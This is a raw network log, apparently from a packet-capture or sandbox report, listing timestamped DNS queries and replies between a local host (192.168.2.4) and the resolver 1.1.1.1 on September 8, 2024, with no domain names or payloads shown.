                                                                                                                                                                                                            Sep 8, 2024 08:58:45.096256971 CEST53626051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.098947048 CEST53545511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.135119915 CEST6358953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.220824003 CEST53536181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.243684053 CEST53647511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.243731022 CEST53647511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.254376888 CEST53635891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.254395008 CEST53635891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.278597116 CEST53647961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.278606892 CEST53647961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.284437895 CEST53579471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.302848101 CEST6076053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.305177927 CEST53496291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.308190107 CEST53518351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.443065882 CEST4988853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.500987053 CEST53498881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.501002073 CEST53498881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.515172005 CEST53607601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.515919924 CEST53607601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.065428019 CEST6511053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:58:46.616940022 CEST53651101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500469923 CEST5395753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500570059 CEST6307753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500663996 CEST5376653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.500782013 CEST6346353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.511909008 CEST53539571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.512968063 CEST53634631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.518373013 CEST53630771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.518522978 CEST53537661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.547883034 CEST5110053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.553045034 CEST5023053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.557250023 CEST53511001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.561888933 CEST53502301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.594664097 CEST5508453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.604087114 CEST53550841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.610730886 CEST5619853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.611857891 CEST5255153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.620193005 CEST53561981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.622580051 CEST53525511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.629679918 CEST5519853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.786416054 CEST6552153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.788228989 CEST5678753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.790548086 CEST53551981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.809535027 CEST5730753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.810296059 CEST6455453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.810656071 CEST5689253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.811458111 CEST6207853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812057018 CEST5321753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812418938 CEST6029553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812649965 CEST5524653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.812741995 CEST6425853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.816425085 CEST53655211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.818890095 CEST5605553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.818932056 CEST53567871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.819936991 CEST53645541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.821455002 CEST53620781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.821691036 CEST53532171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.821919918 CEST53552461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.823097944 CEST53642581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.826893091 CEST53568921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.828296900 CEST53560551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.836227894 CEST5030553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.837300062 CEST6208153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.837538958 CEST5120253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.838946104 CEST6181253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839154959 CEST5031953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839468002 CEST6081153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839636087 CEST5792853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.839782953 CEST5383953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.411268950 CEST53556531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.411592960 CEST53544771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.412538052 CEST53491551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.413050890 CEST6181953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.414282084 CEST53494451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.414493084 CEST53620291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.414627075 CEST53555381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.414951086 CEST6389653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.416169882 CEST4974953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.416380882 CEST5371053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.416743994 CEST53554901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.417089939 CEST53548841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.420053959 CEST6397853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.420634985 CEST5681553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.420785904 CEST53637801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.420836926 CEST6465853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.421789885 CEST5436253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.422652960 CEST53638931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.422665119 CEST53618191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.423681974 CEST6530753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.423959017 CEST6292653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.424515009 CEST53638961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.424742937 CEST5609953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.425144911 CEST5530353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.425365925 CEST5184053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.426196098 CEST53638951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.426883936 CEST5533253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.427638054 CEST53537101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.428004980 CEST5358853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.428344011 CEST53639781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.428888083 CEST53497491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.429222107 CEST6215353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.430241108 CEST53568151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.431139946 CEST53543621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.433726072 CEST53653071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.434019089 CEST53629261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.434078932 CEST53553031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.434880972 CEST53560991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.435343027 CEST4917953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.435357094 CEST53518401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.435970068 CEST5725253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.436183929 CEST53646581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.436372995 CEST53553321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.438363075 CEST53535881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.442187071 CEST6303753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.444166899 CEST5534153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.452169895 CEST53572521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.453783989 CEST53553411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.457856894 CEST5965753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.458071947 CEST5432053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.458236933 CEST5317953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.458340883 CEST53630371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.458401918 CEST6195253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.459203005 CEST5958953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.459798098 CEST6057353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.460180044 CEST5448853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.466037989 CEST53491791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.466567993 CEST53543201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.467427015 CEST53619521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.467519045 CEST53596571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.467972994 CEST53531791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.468887091 CEST53605731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.473794937 CEST53595891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.477154016 CEST53544881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.556942940 CEST53649871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.562607050 CEST53621821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.603466988 CEST53549461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.960262060 CEST53564841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.960280895 CEST53526601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.960292101 CEST53629201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:56.960494995 CEST53621531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.582227945 CEST5416753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.597652912 CEST5597953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.805830956 CEST53559791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:57.931066990 CEST53541671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.651922941 CEST6288353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.655003071 CEST5509953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.656291008 CEST6145953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.660410881 CEST5170553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.662564039 CEST53628831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.667200089 CEST53614591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.676245928 CEST53517051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.688913107 CEST4959453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.690489054 CEST6384053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.693324089 CEST5461653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.693837881 CEST4928953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.695945978 CEST5744953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.696516991 CEST5930153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.697187901 CEST6419953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.697751045 CEST6120253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.698508978 CEST6251353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.698987007 CEST5438453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.699429989 CEST53495941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.699974060 CEST6249653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.700444937 CEST53638401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.701978922 CEST5638753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.702414036 CEST5590653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.703176975 CEST5571353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.703551054 CEST53546161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.703643084 CEST53492891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.704232931 CEST5055153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.706120014 CEST53574491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.706876993 CEST53641991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.708359003 CEST53625131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:58.709100962 CEST53612021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435372114 CEST6176753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435511112 CEST6093753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435676098 CEST6434953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435825109 CEST5652053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.435971022 CEST5479353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436295033 CEST4942053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436497927 CEST6036453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436566114 CEST5097853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436726093 CEST5732253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436784983 CEST5629653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.437239885 CEST5773053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.437477112 CEST53558141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.438705921 CEST53600291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.444639921 CEST53613981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.444763899 CEST53565201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.444782972 CEST53633101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.444885969 CEST53617671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.445311069 CEST53603641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.445359945 CEST53643491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.445626020 CEST53547931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.446010113 CEST53609371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.446021080 CEST53494201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.448745012 CEST53562961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.448755026 CEST53573221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.449184895 CEST53577301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.449873924 CEST53509721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.450023890 CEST53632871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.452004910 CEST53610731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.452331066 CEST53509781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.455363035 CEST53514811.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.455853939 CEST6147953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.456053019 CEST6506553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.456222057 CEST5745853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.459121943 CEST5638353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462091923 CEST5719553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462443113 CEST5614853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462798119 CEST5397553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463213921 CEST4973153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463685036 CEST5734853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463977098 CEST5153953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463989019 CEST4940253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464195013 CEST5134553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464340925 CEST6058353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464458942 CEST5344453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464509964 CEST5345353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464724064 CEST6167853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.464818954 CEST5148453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465053082 CEST6286153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465226889 CEST5426353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465553045 CEST53574581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.465718031 CEST5893353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466330051 CEST4972053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466391087 CEST53614791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466564894 CEST6523453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.466736078 CEST5155353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.467180967 CEST6164653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.467614889 CEST6504353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.471160889 CEST53563831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.472213984 CEST53571951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.472517967 CEST53573481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.472908974 CEST53539751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.472919941 CEST53515391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.473491907 CEST53497311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.473501921 CEST53494021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.473846912 CEST53628611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.474591970 CEST53534441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.474661112 CEST53589331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.476041079 CEST53515531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.476083040 CEST53652341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.477149963 CEST53616461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.477358103 CEST53650431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.478130102 CEST53561481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.478943110 CEST5883653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.479080915 CEST5270653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.479657888 CEST53605831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.479907990 CEST53542631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.481188059 CEST53534531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.481602907 CEST53497201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.481935024 CEST53616781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.486285925 CEST5346953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.489938974 CEST53588361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.493767977 CEST53513451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.496088982 CEST53534691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.595613003 CEST53512591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.622622013 CEST53514841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.713926077 CEST53527061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.749037027 CEST53650651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.866164923 CEST6385953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.876198053 CEST53638591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.773371935 CEST5584953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.773993015 CEST5306553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.774943113 CEST5824153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.775681973 CEST5248653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.779607058 CEST6214553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.782767057 CEST53558491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.784328938 CEST53530651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.788887024 CEST53621451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.793544054 CEST5517853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.794034958 CEST5347053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.794223070 CEST53582411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.795186996 CEST6488353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.799066067 CEST5794253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.802900076 CEST53551781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.803617001 CEST53534701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.804723024 CEST53648831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.248569012 CEST5212053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.250782967 CEST5117253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.251126051 CEST5935853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.253139973 CEST6051353192.168.2.41.1.1.1
